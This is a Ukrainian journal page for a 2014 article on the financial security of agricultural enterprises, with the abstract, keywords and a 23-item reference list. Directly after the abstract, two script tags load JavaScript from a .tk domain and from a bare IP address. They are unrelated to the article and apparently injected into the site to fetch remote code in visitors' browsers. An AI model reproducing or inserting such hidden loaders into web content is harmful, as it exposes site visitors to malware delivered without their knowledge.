ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.131.7:631.162
Сторінка молодого науковця

Економічна сутність фінансової безпеки суб’єктів підприємництва в аграрній сфері економіки / Вдовенко О. С. // Економіка АПК. - 2014. - № 1 - С. 125

Встановлено, що стратегічним напрямом економічної політики держави в умовах ринкових відносин є підтримка сталого рівня фінансової безпеки аграрного сектору економіки. Розкрито сутність поняття «фінансова безпека суб’єктів підприємництва в аграрній сфері економіки» як стану, за якого підприємства стабільно й ефективно функціонують в умовах галузевої невизначеності, включаючи конкурентне середовище та виконання суспільно-економічних функцій продовольчої, екологічної безпеки. Доведено, що прибутковість агропромислового виробництва є визначальним фактором фінансової безпеки підприємств аграрного бізнесу, завдяки чому можна збільшити власний капітал підприємства, сформувати достатній резервний фонд, застрахуватися від ризиків тощо. Зроблено висновок щодо можливості ефективного сільськогосподарського виробництва за умови забезпечення стійкості та стабільності фінансової безпеки й завдяки сприятливій державній політиці. Табл.: 1. Бібліогр.: 23.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: фінансова безпека, фінансовий стан, фінансова стабільність, прибутковість, рентабельність, суб’єкти підприємництва

Список використаних джерел

 1. Барановський О.І. Фінансова безпека в Україні (методологія оцінки та механізм забезпечення): [моногр.] / О.І. Барановський. – К., 2004. – 734 с.
 2. Бланк И. А. Управление финансовой безопасностью предприятия / И.А. Бланк. – К. : Ника – Центр, 2004. – 784 с.
 3. Герасимчук З В. Економічна безпека регіону: діагностика та механізм забезпечення / З.В. Герасимчук, Н.С. Вавдіюк. – Луцьк : Надвір’я, 2006. – 244 с.
 4. Горячева К.С. Механізм управління фінансовою безпекою підприємства: автореф. дис... канд. екон. наук: спец. 08.06.01 «Економіка, організація і управління підприємствами»/ К.С. Горячева. – К.,2006. – С. 5.
 5. Єрмошенко М. М. Фінансова безпека держави: національні інтереси, реальні загрози, стратегія забезпечення / М.М. Єрмошенко. – К. : Київ. нац. торг.-екон. ун-т, 2001. – 310 с.
 6. Гривківська О.В. Забезпечення фінансової безпеки сільського господарства: [моногр.] / О.В. Гривківська – Тернопіль: Астон, 2012. – 340 с.
 7. Жаліло Я.А. Економічна стратегія держави у нестабільних ринкових економічних системах: [моногр.]. – К.: НІСД, 1998. – 144 с.
 8. Bouris Mark. Yellow Brick Road to Your Financial Security / Mark Bouris. – Allen & Unwin, 2008. – 256 р.
 9. Country Financial Security Index: overview [Electronik resource]. – Mode of access: http://www.countryfinancialsecurityindex.com/overview.php.
 10. Lewis D. Solomon. Financial security & personal wealth / Solomon Lewis D - Transaction Publishers, 2005. – 249 p.
 11. Taro Y. Elementary Sampling Theory / Y. Таrо – Englewood Cliffs, NJ.: Prentice-Hall, 1967. – 399 p.
 12. Великий тлумачний словник сучасної української мови ( з дод., допов. та СD) / уклад. і гол. ред. В.Т.Бусел.- К. Ірпінь: ВТФ «Перун», 2007. – 1736 с.
 13. Мочерний С.В. Економічний енциклопедичний словник / С.В. Мочерний, Я.С. Ларина, О.А. Устенко, С.І. Юрій. – У 2 т. –Т.1; за ред. С.В. Мочерного. – Львів: Світ, 2005. – 616 с.
 14. Юридична енциклопедія: У 6 т. / редкол.: Ю.С. Шемшученко (відповід. ред.) та ін. – К.: «Укр. енциклоп.», 1998. –Т.1: А-Г 672 с.
 15. Мочерний С.В. Економічна енциклопедія у 3 т. / C.В. Мочерний. – Т. 1. Вид. центр «Академія», 2000. – 864 с.
 16. Ареф’єва О.В. Економічні основи формування фінансової складової економічної безпеки / О.В. Ареф’єва, Т.Б. Кузенко // Актуальні проблеми економіки. – 2009. – №1(91). – С. 101
 17. Захаров О.І. Організація та управління економічною безпекою суб’єктів господарської діяльності: навч. посіб. / О.І. Захаров, П.Я. Пригунов. – К.,2008. – С.75-78.
 18. Кириченко О.А. Вплив інфляційних процесів на фінансову безпеку підприємства / О.А. Кириченко, Ю.Г. Кім // Економіка і держава. – 2009. – № 1. – С. 13-17.
 19. Приказюк О. Прибуток у формуванні фінансової безпеки сільськогосподарських підприємств / О. Приказюк // Банківська справа. – 2009. – № 2. – С. 82-88.
 20. Фінансово-економічні показники діяльності сільськогосподарських підприємств Вінниччини. Стат. зб. / Державна служба статистики України. Головне управління статистики у Вінницькій області; за ред. В.Ф. Пікало). – 2011. –156 с.
 21. Фінансово-економічні показники діяльності сільськогосподарських підприємств Вінниччини. Стат. зб. / Державна служба статистики України. Головне управління статистики у Вінницькій області; за ред. В.Ф. Пікало. – 2012. – 124 с.
 22. Квятківський Ю.В. Критерії оцінки фінансової безпеки суб’єктів аграрної сфери / Ю.В. Квятківський // Економіка АПК. – 2009. – № 11. – С.70-75.
 23. Волошин В.І. Проблеми та пріоритети зміцнення фінансової безпеки малого й середнього підприємництва в Україні / В.І. Волошин // Фінанси України. – 2011. – №11. – С.76-83.
Читати статтю: 14_01_125-129.pdf
Читати переклад статті: 1401vdovenko.pdf